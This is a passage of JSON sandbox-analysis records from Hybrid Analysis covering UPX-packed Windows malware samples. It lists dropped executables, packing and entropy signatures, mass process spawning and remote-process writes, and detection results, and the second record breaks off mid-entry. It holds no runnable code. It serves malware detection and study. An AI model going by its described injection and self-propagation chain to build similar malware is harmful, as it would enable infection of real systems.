executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rdnjbjh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"2408206.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"2204200.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"28042.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"028260.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"tfdbnrd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rjrvvt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"blnxt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\blnxt.exe]- [targetUID: 00000000-00003896]\n \"tnvhlh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tnvhlh.exe]- [targetUID: 00000000-00004480]\n \"ljhdxt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ljhdxt.exe]- [targetUID: 00000000-00004480]\n \"82426.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\82426.exe]- [targetUID: 00000000-00004236]\n \"28646.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\28646.exe]- [targetUID: 00000000-00004164]\n \"228864.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\228864.exe]- [targetUID: 00000000-00003812]\n \"8402266.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8402266.exe]- [targetUID: 00000000-00003812]\n \"088422.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\088422.exe]- [targetUID: 00000000-00004040]\n \"464224.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\464224.exe]- [targetUID: 00000000-00004040]\n \"406266.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\406266.exe]- [targetUID: 00000000-00000888]\n \"flxrvf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\flxrvf.exe]- [targetUID: 00000000-00000888]\n \"fnxtfnf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fnxtfnf.exe]- [targetUID: 00000000-00000984]\n \"dvrdv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dvrdv.exe]- [targetUID: 00000000-00000984]\n \"pxnlrd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pxnlrd.exe]- [targetUID: 00000000-00003912]\n \"dpbtn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dpbtn.exe]- [targetUID: 00000000-00003912]\n \"lxrvjtr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lxrvjtr.exe]- [targetUID: 00000000-00000700]\n \"2028620.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2028620.exe]- [targetUID: 00000000-00003372]\n \"084242.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\084242.exe]- [targetUID: 00000000-00003760]\n \"22866.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\22866.exe]- [targetUID: 00000000-00003760]\n \"042028.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\042028.exe]- [targetUID: 00000000-00002384]\n \"60808.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\60808.exe]- [targetUID: 00000000-00001632]\n \"8482804.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8482804.exe]- [targetUID: 00000000-00001632]\n \"8844842.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8844842.exe]- [targetUID: 00000000-00004260]\n \"8082460.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8082460.exe]- [targetUID: 00000000-00004260]\n \"80428.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\80428.exe]- [targetUID: 00000000-00004344]\n \"840882.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\840882.exe]- [targetUID: 00000000-00002072]\n \"fpdjbdp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fpdjbdp.exe]- [targetUID: 00000000-00002072]\n \"fnpdnrn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fnpdnrn.exe]- [targetUID: 00000000-00002204]\n \"tlxfnh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tlxfnh.exe]- [targetUID: 00000000-00002204]\n \"pthvxnr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pthvxnr.exe]- [targetUID: 00000000-00003512]\n \"dtvthvj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dtvthvj.exe]- [targetUID: 00000000-00003512]\n \"24006.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\24006.exe]- [targetUID: 00000000-00003440]\n \"60448.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\60448.exe]- [targetUID: 00000000-00004148]\n \"44244.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\44244.exe]- [targetUID: 00000000-00004148]\n \"2628842.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2628842.exe]- [targetUID: 00000000-00000780]\n \"hbdtpx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hbdtpx.exe]- [targetUID: 00000000-00003780]\n \"hrrxd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hrrxd.exe]- [targetUID: 00000000-00003996]\n \"vfpfhn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vfpfhn.exe]- [targetUID: 00000000-00003996]\n \"hhrpl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hhrpl.exe]- [targetUID: 00000000-00003784]\n \"nblht.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nblht.exe]- [targetUID: 00000000-00003208]\n \"xbbfdpr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xbbfdpr.exe]- [targetUID: 00000000-00003208]\n \"8460680.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8460680.exe]- [targetUID: 00000000-00003776]\n \"442602.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\442602.exe]- [targetUID: 00000000-00003776]\n \"2886400.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2886400.exe]- [targetUID: 00000000-00000832]\n \"fhftdj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fhftdj.exe]- [targetUID: 00000000-00005868]\n \"rfhxbp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rfhxbp.exe]- [targetUID: 00000000-00004372]\n \"rbtft.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rbtft.exe]- [targetUID: 00000000-00005252]\n \"6028624.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6028624.exe]- [targetUID: 00000000-00005252]\n \"42068.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\42068.exe]- [targetUID: 00000000-00003580]\n \"4042240.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4042240.exe]- [targetUID: 00000000-00004352]\n \"28886.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\28886.exe]- [targetUID: 00000000-00004284]\n \"00226.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\00226.exe]- [targetUID: 00000000-00004284]\n \"ldlfr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ldlfr.exe]- [targetUID: 00000000-00004128]\n \"drrxb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\drrxb.exe]- [targetUID: 00000000-00006020]\n \"482606.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\482606.exe]- [targetUID: 00000000-00006020]\n \"8442880.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8442880.exe]- [targetUID: 00000000-00005968]\n \"4400860.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4400860.exe]- [targetUID: 00000000-00006132]\n \"800866.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\800866.exe]- [targetUID: 00000000-00006132]\n \"8080888.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8080888.exe]- [targetUID: 00000000-00006000]\n \"nxpbdf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nxpbdf.exe]- [targetUID: 00000000-00006000]\n \"xdpjtxl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xdpjtxl.exe]- [targetUID: 00000000-00005840]\n \"vplpt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vplpt.exe]- [targetUID: 00000000-00005840]\n \"lbxbhh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lbxbhh.exe]- [targetUID: 00000000-00005896]\n \"ptnfvbx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ptnfvbx.exe]- [targetUID: 00000000-00005816]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e\" has section name UPX1 with entropy \"7.97244478673\"\n \"64446.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"fjpblh.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"06268.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"rlxfxx.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"rxvnflf.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"80060.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"66686.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"624000.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"6206480.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"rdnjbjh.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"2408206.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"2204200.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"28042.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"028260.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"tfdbnrd.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"rjrvvt.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"blnxt.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"tnvhlh.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"ljhdxt.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"82426.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"28646.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"228864.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"8402266.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"088422.exe\" has section name UPX1 with entropy \"7.97244478673\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-7", "relevance": 10, "name": "PE file is packed with UPX", "description": "\"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e\" has a section named \"UPX0\"\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e\" has a section named \"UPX1\"\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e\" has a section named \"UPX2\"\n \"64446.exe\" has a section named \"UPX0\"\n \"64446.exe\" has a section named \"UPX1\"\n \"64446.exe\" has a section named \"UPX2\"\n \"fjpblh.exe\" has a section named \"UPX0\"\n \"fjpblh.exe\" has a section named \"UPX1\"\n \"fjpblh.exe\" has a section named \"UPX2\"\n \"06268.exe\" has a section named \"UPX0\"\n \"06268.exe\" has a section named \"UPX1\"\n \"06268.exe\" has a section named \"UPX2\"\n \"rlxfxx.exe\" has a section named \"UPX0\"\n \"rlxfxx.exe\" has a section named \"UPX1\"\n \"rlxfxx.exe\" has a section named \"UPX2\"\n \"rxvnflf.exe\" has a section named \"UPX0\"\n \"rxvnflf.exe\" has a section named \"UPX1\"\n \"rxvnflf.exe\" has a section named \"UPX2\"\n \"80060.exe\" has a section named \"UPX0\"\n \"80060.exe\" has a section named \"UPX1\"\n \"80060.exe\" has a section named \"UPX2\"\n \"66686.exe\" has a section named \"UPX0\"\n \"66686.exe\" has a section named \"UPX1\"\n \"66686.exe\" has a section named \"UPX2\"\n \"624000.exe\" has a section named \"UPX0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (UID: 00000000-00005816)\n Spawned process \"ptnfvbx.exe\" (UID: 00000000-00005896)\n Spawned process \"lbxbhh.exe\" (UID: 00000000-00005792)\n Spawned process \"vplpt.exe\" (UID: 00000000-00005840)\n Spawned process \"xdpjtxl.exe\" (UID: 00000000-00006048)\n Spawned process \"nxpbdf.exe\" (UID: 00000000-00006000)\n Spawned process \"8080888.exe\" (UID: 00000000-00005784)\n Spawned process \"800866.exe\" (UID: 00000000-00006132)\n Spawned process \"4400860.exe\" (UID: 00000000-00005968)\n Spawned process \"8442880.exe\" (UID: 00000000-00004104)\n Spawned process \"482606.exe\" (UID: 00000000-00006020)\n Spawned process \"drrxb.exe\" (UID: 00000000-00004128)\n Spawned process \"ldlfr.exe\" (UID: 00000000-00006008)\n Spawned process \"00226.exe\" (UID: 00000000-00004284)\n Spawned process \"28886.exe\" (UID: 00000000-00004244)\n Spawned process \"4042240.exe\" (UID: 00000000-00004352)\n Spawned process \"42068.exe\" (UID: 00000000-00003580)\n Spawned process \"6028624.exe\" (UID: 00000000-00005252)\n Spawned process \"rbtft.exe\" (UID: 00000000-00004372)\n Spawned process \"rfhxbp.exe\" (UID: 00000000-00005868)\n Spawned process \"fhftdj.exe\" (UID: 00000000-00000832)\n Spawned process \"2886400.exe\" (UID: 00000000-00002728)\n Spawned process \"442602.exe\" (UID: 00000000-00003776)\n Spawned process \"8460680.exe\" (UID: 00000000-00002496)\n Spawned process \"xbbfdpr.exe\" (UID: 00000000-00003208)\n Spawned process \"nblht.exe\" (UID: 00000000-00003784)\n Spawned process \"hhrpl.exe\" (UID: 00000000-00000880)\n Spawned process \"vfpfhn.exe\" (UID: 00000000-00003996)\n Spawned process \"hrrxd.exe\" (UID: 00000000-00003780)\n Spawned process \"hbdtpx.exe\" (UID: 00000000-00000780)\n Spawned process \"2628842.exe\" (UID: 00000000-00004068)\n Spawned process \"44244.exe\" (UID: 00000000-00004148)\n Spawned process \"60448.exe\" (UID: 00000000-00003384)\n Spawned process \"24006.exe\" (UID: 00000000-00003440)\n Spawned process \"dtvthvj.exe\" (UID: 00000000-00003512)\n Spawned process \"pthvxnr.exe\" (UID: 00000000-00003872)\n Spawned process \"tlxfnh.exe\" (UID: 00000000-00002204)\n Spawned process \"fnpdnrn.exe\" (UID: 00000000-00004036)\n Spawned process \"fpdjbdp.exe\" (UID: 00000000-00002072)\n Spawned process \"840882.exe\" (UID: 00000000-00004344)\n Spawned process \"80428.exe\" (UID: 00000000-00004452)\n Spawned process \"8082460.exe\" (UID: 00000000-00004260)\n Spawned process \"8844842.exe\" (UID: 00000000-00003600)\n Spawned process \"8482804.exe\" (UID: 00000000-00001632)\n Spawned process \"60808.exe\" (UID: 00000000-00002384)\n Spawned process \"042028.exe\" (UID: 00000000-00004472)\n Spawned process \"22866.exe\" (UID: 00000000-00003760)\n Spawned process \"084242.exe\" (UID: 00000000-00003372)\n Spawned process \"2028620.exe\" (UID: 00000000-00003388)\n Spawned process \"lxrvjtr.exe\" (UID: 00000000-00000700)\n Spawned process \"dpbtn.exe\" (UID: 00000000-00003912)\n Spawned process \"pxnlrd.exe\" (UID: 00000000-00000724)\n Spawned process \"dvrdv.exe\" (UID: 00000000-00000984)\n Spawned process \"fnxtfnf.exe\" (UID: 00000000-00002344)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" wrote 32 bytes to a remote process \"C:\\ptnfvbx.exe\" (Handle: 116)\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" wrote 52 bytes to a remote process \"C:\\ptnfvbx.exe\" (Handle: 116)\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" wrote 4 bytes to a remote process \"C:\\ptnfvbx.exe\" (Handle: 116)\n \"ptnfvbx.exe\" wrote 32 bytes to a remote process \"C:\\lbxbhh.exe\" (Handle: 64)\n \"ptnfvbx.exe\" wrote 52 bytes to a remote process \"C:\\lbxbhh.exe\" (Handle: 64)\n \"ptnfvbx.exe\" wrote 4 bytes to a remote process \"C:\\lbxbhh.exe\" (Handle: 64)\n \"lbxbhh.exe\" wrote 32 bytes to a remote process \"C:\\vplpt.exe\" (Handle: 116)\n \"lbxbhh.exe\" wrote 52 bytes to a remote process \"C:\\vplpt.exe\" (Handle: 116)\n \"lbxbhh.exe\" wrote 4 bytes to a remote process \"C:\\vplpt.exe\" (Handle: 116)\n \"vplpt.exe\" wrote 32 bytes to a remote process \"C:\\xdpjtxl.exe\" (Handle: 68)\n \"vplpt.exe\" wrote 52 bytes to a remote process \"C:\\xdpjtxl.exe\" (Handle: 68)\n \"vplpt.exe\" wrote 4 bytes to a remote process \"C:\\xdpjtxl.exe\" (Handle: 68)\n \"xdpjtxl.exe\" wrote 32 bytes to a remote process \"C:\\nxpbdf.exe\" (Handle: 68)\n \"xdpjtxl.exe\" wrote 52 bytes to a remote process \"C:\\nxpbdf.exe\" (Handle: 68)\n \"xdpjtxl.exe\" wrote 4 bytes to a remote process \"C:\\nxpbdf.exe\" (Handle: 68)\n \"nxpbdf.exe\" wrote 32 bytes to a remote process \"C:\\8080888.exe\" (Handle: 68)\n \"nxpbdf.exe\" wrote 52 bytes to a remote process \"C:\\8080888.exe\" (Handle: 68)\n \"nxpbdf.exe\" wrote 4 bytes to a remote process \"C:\\8080888.exe\" (Handle: 68)\n \"8080888.exe\" wrote 32 bytes to a remote process \"C:\\800866.exe\" (Handle: 116)\n \"8080888.exe\" wrote 52 bytes to a remote process \"C:\\800866.exe\" (Handle: 116)\n \"8080888.exe\" wrote 4 bytes to a remote process \"C:\\800866.exe\" (Handle: 116)\n \"800866.exe\" wrote 32 bytes to a remote process \"C:\\4400860.exe\" (Handle: 68)\n \"800866.exe\" wrote 52 bytes to a remote process \"C:\\4400860.exe\" (Handle: 68)\n \"800866.exe\" wrote 4 bytes to a remote process \"C:\\4400860.exe\" (Handle: 68)\n \"4400860.exe\" wrote 32 bytes to a remote process \"C:\\8442880.exe\" (Handle: 116)\n \"4400860.exe\" wrote 52 bytes to a remote process \"C:\\8442880.exe\" (Handle: 116)\n \"4400860.exe\" wrote 4 bytes to a remote process \"C:\\8442880.exe\" (Handle: 116)\n \"8442880.exe\" wrote 32 bytes to a remote process \"C:\\482606.exe\" (Handle: 116)\n \"8442880.exe\" wrote 52 bytes to a remote process \"C:\\482606.exe\" (Handle: 116)\n \"8442880.exe\" wrote 4 bytes to a remote process \"C:\\482606.exe\" (Handle: 116)\n \"482606.exe\" wrote 32 bytes to a remote process \"C:\\drrxb.exe\" (Handle: 116)\n \"482606.exe\" wrote 52 bytes to a remote process \"C:\\drrxb.exe\" (Handle: 116)\n \"482606.exe\" wrote 4 bytes to a remote process \"C:\\drrxb.exe\" (Handle: 116)\n \"drrxb.exe\" wrote 32 bytes to a remote process \"C:\\ldlfr.exe\" (Handle: 68)\n \"drrxb.exe\" wrote 52 bytes to a remote process \"C:\\ldlfr.exe\" (Handle: 68)\n \"drrxb.exe\" wrote 4 bytes to a remote process \"C:\\ldlfr.exe\" (Handle: 68)\n \"ldlfr.exe\" wrote 32 bytes to a remote process \"C:\\00226.exe\" (Handle: 72)\n \"ldlfr.exe\" wrote 52 bytes to a remote process \"C:\\00226.exe\" (Handle: 72)\n \"ldlfr.exe\" wrote 4 bytes to a remote process \"C:\\00226.exe\" (Handle: 72)\n \"00226.exe\" wrote 32 bytes to a remote process \"C:\\28886.exe\" (Handle: 116)\n \"00226.exe\" wrote 52 bytes to a remote process \"C:\\28886.exe\" (Handle: 116)\n \"00226.exe\" wrote 4 bytes to a remote process \"C:\\28886.exe\" (Handle: 116)\n \"28886.exe\" wrote 32 bytes to a remote process \"C:\\4042240.exe\" (Handle: 116)\n \"28886.exe\" wrote 52 bytes to a remote process \"C:\\4042240.exe\" (Handle: 116)\n \"28886.exe\" wrote 4 bytes to a remote process \"C:\\4042240.exe\" (Handle: 116)\n \"4042240.exe\" wrote 32 bytes to a remote process \"C:\\42068.exe\" (Handle: 120)\n \"4042240.exe\" wrote 52 bytes to a remote process \"C:\\42068.exe\" (Handle: 120)\n \"4042240.exe\" wrote 4 bytes to a remote process \"C:\\42068.exe\" (Handle: 120)\n \"42068.exe\" wrote 32 bytes to a remote process \"C:\\6028624.exe\" (Handle: 116)\n \"42068.exe\" wrote 52 bytes to a remote process \"C:\\6028624.exe\" (Handle: 116)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac
https://hybrid-analysis.com/sample/67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac
Hybrid Analysis - Infostealers
{"size": 342514, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "submit_name": "67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac", "sha256": "67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac", "av_detect": 96, "vx_family": "Trojan.Dinwod", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "The operation completed successfully. (0x0)", "total_processes": 64, "total_signatures": 110, "extracted_files": [{"name": "0066646.exe", "file_path": "C:\\0066646.exe", "file_size": 343391, "sha256": "6faf09c33ed53db04f7cc1d16d8a06e92fbd675f6252561c57820999f706dd04", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "066460.exe (PID: 4652)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "04028.exe", "file_path": "C:\\04028.exe", "file_size": 342886, "sha256": "c0e10fa92a1c4375b65b0e1e65c04b622cb136e8c6b66bc0eb35ee32a32f6271", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "080068.exe (PID: 4316)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "06460.exe", "file_path": "C:\\06460.exe", "file_size": 343115, "sha256": "27ec649b7ba0dcfb84d74b3d7e199faefb55d103f985990621780e1738c6d046", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "06460.exe (PID: 2952)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "066460.exe", "file_path": "C:\\066460.exe", "file_size": 343378, "sha256": "11205d30931d22bade3c00092b973f942d3a935c76592c61fe7dfe2dbd98eb86", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6400262.exe (PID: 1692)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "080068.exe", "file_path": "C:\\080068.exe", "file_size": 342876, "sha256": "ffabd1def42aa858e6c92e2f7153a7ffba030549588df3b4caa2ad914204c3ef", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4442828.exe (PID: 3716)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "22228.exe", "file_path": "C:\\22228.exe", "file_size": 343208, "sha256": "e71dffcf31924707dbd154c38632e979bce91f4f8edd18ef68a2de1048ee5e27", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "680060.exe (PID: 2956)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "242220.exe", "file_path": "C:\\242220.exe", "file_size": 343235, "sha256": "56fbf5d34bb43293e3e7fd0bc581192f9c73ea89a98ae827515b7c66e77a95a1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "66846.exe (PID: 3656)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "244640.exe", "file_path": "C:\\244640.exe", "file_size": 343065, "sha256": "f7ab1efed8886acfc62b2606492f3a44b8d593204f4899b64d0c9ab4a558b4ce", "type_tags": ["peexe", "executable"], 